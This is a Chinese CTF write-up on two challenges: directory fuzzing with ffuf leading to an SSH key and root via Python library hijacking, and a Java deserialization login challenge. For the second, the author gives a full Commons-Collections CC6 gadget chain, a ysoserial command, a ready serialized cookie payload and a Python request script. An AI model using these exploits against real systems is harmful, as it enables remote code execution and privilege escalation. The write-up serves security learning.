渗透、CC6实际场景利用初体验

渗透

wp

linux下ssh使用除了22的其它端口来连接远程服务器_CrystalheartLi的博客-CSDN博客_linux除了ssh还有什么能链接服务器

问题:

  • kali默认连接端口要增加10022
  • sshkey文件要增加权限

简单记录一下:

hint:

1.ssh连接10022

2.ffuf /~hint

题目有robots.txt

进入/~hint/,是假的Error界面

ffuf

1
ffuf -u http://172.22.236.111:8080/~FUZZ -w /usr/share/wfuzz/wordlist/general/common.txt

~secret,用户为jasontt,密码为1234

image-20220409193703147

要找ssh private key

1
ffuf -u http://172.22.236.111:8080/~secret/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -fc 403 -e .txt,.html,.php

secret.txt,私钥在这里

base85解密,复制黏贴到kali,新建文件sshkey

注意ssh私钥的格式 在末尾会有一个换行符

ssh连接

注意本地的 sshd_config 里面要加上10022端口

1
ssh -i sshkey jasontt@172.22.36.111 -p 10022

提权

Python库劫持

sudo -l // 显示出自己(执行 sudo 的使用者)的权限

可以发现我们有无密(root)权限执行

本地有Tiquan.py,调用了webbrowser.py

1
2
locate webbrowser.py
# /usr/lib/python3.8/webbrowser.py

webbrowser.py里面执行了os.system("/bin/bash")

赛时做的时候不知道为什么 执行这条命令的时候没有成功进入root

赛后,后来发现os.system没有 用nano加了一下才进去

1
2
sudo -u root /usr/bin/python3.8 /home/jasontt/Tiquan.py
# 进入root

flag在根目录

login4

  • java 反序列化

赛前:

因为某些原因 一直以为是tomcat内存马 fastjson去了

看了wp发现原来没有想象中那么难

hint打不开(!!!!!!!!!! 也完全找不到

又是熟悉的登录界面,尝试之后发现不管登录什么都会登陆成功,所以应该和这个没什么关系

然后扫了一下发现有/admin/html,又是登录,但是又是登录不成功

然后发现cookie里面有一个user,base解密之后可以发现是java序列化之后的byte,也可以看出来是User类又username和password,然后就开始致力于修改cookie实现admin登陆

太菜了,应该能想到cookie是入口的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
package demo;

//import java.io.*;
import Utity.User;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;

public class Deserialize {
    public static void serialize(User std) throws IOException {
        ObjectOutputStream obj = new ObjectOutputStream(new FileOutputStream("output.txt"));
        obj.writeObject(std);
        System.out.println("序列化成功");
        obj.close();
    }
    // �� sr demo.Student��e�(�� I idC sexL namet Ljava/lang/String;xp   Yst Ameuu
    public static void unSerialize() throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(new File("output.txt")));
        User o =  (User) objectInputStream.readObject();
        System.out.println(o);
        System.out.println(o.getUsername());
        System.out.println(o.getPassword());
        System.out.println("反序列化成功");
        objectInputStream.close();
    }
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        byte[] code = Base64.getDecoder().decode("rO0ABXNyAApVdGl0eS5Vc2VyaBsf8IrggOECAAJMAAhwYXNzd29yZHQAEkxqYXZhL2xhbmcvU3RyaW5nO0wACHVzZXJuYW1lcQB+AAF4cHB0AAVhZG1pbg==");
        System.out.println(code);
        OutputStream out = new FileOutputStream("output.txt");
        InputStream is = new ByteArrayInputStream(code);

        byte[] buff = new byte[1024];
        int len = 0;
        while((len=is.read(buff))!=-1){
            out.write(buff, 0, len);
        }
        is.close();
//        File file = new File("output.txt");
//        FileWriter fileWriter = new FileWriter(file.getAbsoluteFile());
//        BufferedWriter bufferedWriter = new BufferedWriter(fileWriter);
//        bufferedWriter.write(String.valueOf(code));
//        bufferedWriter.close();
//        User user = new User();
//        serialize(user);
        unSerialize();

//        File file = new File("output.txt");
//        int size = (int) file.length();
//        byte[] buffer = new byte[size];
//        FileInputStream in = null;
//        try {
//            in = new FileInputStream(file);
//            int len = 0;
//            if ((len = in.available()) <= buffer.length) {
//                in.read(buffer, 0, len);
//            }
//        }
//        catch (Exception e){
//
//        }
//        String base64 = Base64.getEncoder().encodeToString(buffer);
//        System.out.println(base64);
    }
}

复现:

(从运维那里拿了docker

1
2
3
docker-compose build
docker-compose up -d
docker ps

img

开始!

因为jdk版本未知,所以用CC6的poc比较保险,可惜一开始不知道为什么执迷于CC1了 思维不行(菜

这里用的是P神的CC6,命令来自wp,比赛的时候hint没打开

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
package ysoserial.payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class CC6ForP {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        Transformer[] fakeTransformers = new Transformer[]{
            new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                new Class[]{String.class,Class[].class},
                new Object[]{"getRuntime",new Class[0]}
            ),
            new InvokerTransformer("invoke",new Class[]{
                Object.class,Object[].class
            },new Object[]{null,new Object[0]}),
            new InvokerTransformer("exec",new Class[]{String.class},new String[]{"bash -c {echo,Y2F0IC9mbGFnID4uL3dlYmFwcHMvUk9PVC9mbGFnLnBocA==}|{base64,-d}|{bash,-i}"}),
            new ConstantTransformer(1),

        };

        Transformer transformerChain = new ChainedTransformer(fakeTransformers);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "aa");

        Map expMap = new HashMap();
        expMap.put(tiedMapEntry, "bb");

        outerMap.remove("aa");

        Field field = ChainedTransformer.class.getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(transformerChain,transformers);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);

        oos.writeObject(expMap);
        oos.close();
        byte[] bytes = barr.toByteArray();
        String s = Base64.getEncoder().encodeToString(bytes);
        System.out.println(s);

        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new
            ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}

或者用ysoserial:

1
java -jar ysoserial.jar CommonsCollections1 'bash -c {echo,Y2F0IC9mbGFnID4uL3dlYmFwcHMvUk9PVC9mbGFnLnBocA==}|{base64,-d}|{bash,-i}' | base64
  1. 可以直接在网页修改cookie,然后访问admin保持登录状态,实现cookie反序列化命令执行
1
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXQAEkxqYXZhL2xhbmcvT2JqZWN0O0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwdAACYWFzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHEAfgADeHB2cgARamF2YS5sYW5nLlJ1bnRpbWUAAAAAAAAAAAAAAHhwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnZva2VyVHJhbnNmb3JtZXKH6P9re3zOOAIAA1sABWlBcmdzdAATW0xqYXZhL2xhbmcvT2JqZWN0O0wAC2lNZXRob2ROYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AApnZXRSdW50aW1ldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAdAAJZ2V0TWV0aG9kdXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHZxAH4AG3NxAH4AE3VxAH4AGAAAAAJwdXEAfgAYAAAAAHQABmludm9rZXVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLk9iamVjdAAAAAAAAAAAAAAAeHB2cQB+ABhzcQB+ABN1cgATW0xqYXZhLmxhbmcuU3RyaW5nO63SVufpHXtHAgAAeHAAAAABdABVYmFzaCAtYyB7ZWNobyxZMkYwSUM5bWJHRm5JRDR1TDNkbFltRndjSE12VWs5UFZDOW1iR0ZuTG5Cb2NBPT19fHtiYXNlNjQsLWR9fHtiYXNoLC1pfXQABGV4ZWN1cQB+ABsAAAABcQB+ACBzcQB+AA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNxAH4AAD9AAAAAAAAMdwgAAAAQAAAAAHh4dAACYmJ4
  1. python
1
2
3
4
5
6
7
8
9
10
import requests

url = 'http://82.156.2.166:9999/'

headers = {"Cookie": "user=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXQAEkxqYXZhL2xhbmcvT2JqZWN0O0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwdAACYWFzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHEAfgADeHB2cgARamF2YS5sYW5nLlJ1bnRpbWUAAAAAAAAAAAAAAHhwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnZva2VyVHJhbnNmb3JtZXKH6P9re3zOOAIAA1sABWlBcmdzdAATW0xqYXZhL2xhbmcvT2JqZWN0O0wAC2lNZXRob2ROYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AApnZXRSdW50aW1ldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAdAAJZ2V0TWV0aG9kdXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHZxAH4AG3NxAH4AE3VxAH4AGAAAAAJwdXEAfgAYAAAAAHQABmludm9rZXVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLk9iamVjdAAAAAAAAAAAAAAAeHB2cQB+ABhzcQB+ABN1cgATW0xqYXZhLmxhbmcuU3RyaW5nO63SVufpHXtHAgAAeHAAAAABdABVYmFzaCAtYyB7ZWNobyxZMkYwSUM5bWJHRm5JRDR1TDNkbFltRndjSE12VWs5UFZDOW1iR0ZuTG5Cb2NBPT19fHtiYXNlNjQsLWR9fHtiYXNoLC1pfXQABGV4ZWN1cQB+ABsAAAABcQB+ACBzcQB+AA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNxAH4AAD9AAAAAAAAMdwgAAAAQAAAAAHh4dAACYmJ4"}
# print(headers)
res = requests.get(url+"admin/", headers)
# print(res.text)
res = requests.get(url=url+"flag.php")
print(res.text)

审计:

一共只有四个类SerializeAuthFilterdoLoginUser

Serialize就是实现序列化和反序列化,User类也没多少内容,而doLogin就是简单的登录判断,重定向到admin/index.jsp或者/index.jsp

实现反序列化主要是在AuthFilter,在/admin/下对cookie进行反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// /admin/*

public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain) throws ServletException, IOException {
    HttpServletRequest request = (HttpServletRequest)req;
    HttpServletResponse response = (HttpServletResponse)resp;
    Cookie[] cookies = request.getCookies();
    String cookie = null;
    User user = null;
    if (cookies == null) {
        request.setAttribute("msg", "请登陆");
    } else {
        int i = 0;

        while(true) {
            if (i >= cookies.length) {
                try {
                    user = (User)Serialize.deserialize(cookie); // 反序列触发链子
                } catch (Exception var11) {
                    var11.printStackTrace();
                    response.sendRedirect(request.getContextPath() + "/index.jsp");
                    return;
                }
                 ……
            }
        }
               
}

小结

还是太菜啦~

1.ffuf的使用、python劫持库提权、CC6的简单运用

2.渗透真的是直接跟着hhg的博客就可以直接得到flag了,但是一开始在连接ssh上面因为sshkey文档没有换行符卡了半天,然后执行 Tiquan.py的时候一开始有os.system("/bin/bahs"),但是弄着弄着这个语句就没了,因为一开始看原来的博客有点不理解,所以也卡了半天,最后看了另一篇博客才得到flag,然后赛后换号复现的时候发现,如果中间没出现问题的的话,直接执行Tiquan.py就可以了,很难过

1.java反序列化,感觉还是太菜了,因为没有做过多少题,所以对cookie上面的反序列化不敏感,反而一直在想构造payload伪造admin登录。一开始跟着payload复现的时候一直在用ysoserial的CC1来构造,总是过不去,后来突然才想到会不会是jdk版本的原因,应该要想到的,得多做点题((((